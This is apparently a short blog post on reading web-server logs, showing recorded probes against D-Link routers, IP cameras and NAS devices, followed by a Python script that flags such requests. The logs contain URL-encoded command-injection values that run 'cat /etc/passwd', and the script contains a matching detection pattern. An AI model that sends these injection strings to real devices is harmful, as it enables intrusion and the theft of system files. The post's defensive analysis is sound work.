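Tuesday, October 10, 2017

Learning About System Vulnerabilities from Web Logs

A website's log files can teach you quite a lot about how vulnerabilities are attacked: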

125.130.189.3 - - [10/Oct/2017:15:14:30 +0800] "POST /hedwig.cgi HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:35 +0800] "GET /system.ini?loginuse&loginpas HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:41 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:46 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:51 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:57 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:02 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:07 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:12 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
125.130.189.3 - - [10/Oct/2017:15:15:18 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
125.130.189.3 - - [10/Oct/2017:15:15:23 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203


Of these, hedwig.cgi is a vulnerability in certain D-Link routers
system.ini?loginuse&loginpas may be a network camera vulnerability
upgrade_handle.php may be a vulnerability in some NAS device
:
:
:
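
Log entries like these can be triaged automatically. The following Python is an added example, not part of the original post: it parses the access-log lines above, URL-decodes each query string, and tags requests that hit the device paths the post names or that carry shell metacharacters, then groups them by source IP. The tag names, the regular expressions and the 192.0.2.10 line are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Distinct requests from the log above, plus one constructed benign line (192.0.2.10).
SAMPLE_LOG = """\
125.130.189.3 - - [10/Oct/2017:15:14:30 +0800] "POST /hedwig.cgi HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:35 +0800] "GET /system.ini?loginuse&loginpas HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:41 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:57 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:12 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
192.0.2.10 - - [10/Oct/2017:15:16:00 +0800] "GET /index.html HTTP/1.1" 200 1024
"""

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Tags follow the post's attributions (two of them are stated only as "may be").
DEVICE_PATHS = {"/hedwig.cgi": "d-link-router", "/system.ini": "ip-camera",
                "/upgrade_handle.php": "nas"}
# Shell metacharacters or a sensitive file name in the decoded query string.
CMD_INJECTION = re.compile(r"/etc/passwd|[;|`]|\$\(")

def classify(line):
    """Return (ip, status, tags) for one log line, or None if it does not parse."""
    m = CLF.match(line.strip())
    if not m:
        return None
    ip, _method, target, status = m.groups()
    url = urlsplit(target)
    tags = {DEVICE_PATHS[url.path]} if url.path in DEVICE_PATHS else set()
    # Decode first so %20 / %27 style encodings cannot hide the payload.
    if CMD_INJECTION.search(unquote(url.query)):
        tags.add("command-injection")
    return ip, int(status), tags

def summarize(log_text):
    """Group flagged requests by source IP and count replies other than 404."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "non_404": 0})
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            ip, status, tags = parsed
            report[ip]["hits"] += 1
            report[ip]["tags"] |= tags
            report[ip]["non_404"] += status != 404
    return dict(report)

if __name__ == "__main__":
    for ip, e in summarize(SAMPLE_LOG).items():
        print(ip, e["hits"], sorted(e["tags"]), "non-404:", e["non_404"])
```

A non-zero `non_404` count is the field to look at first: it means a probed path actually exists on the server and the response should be inspected.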
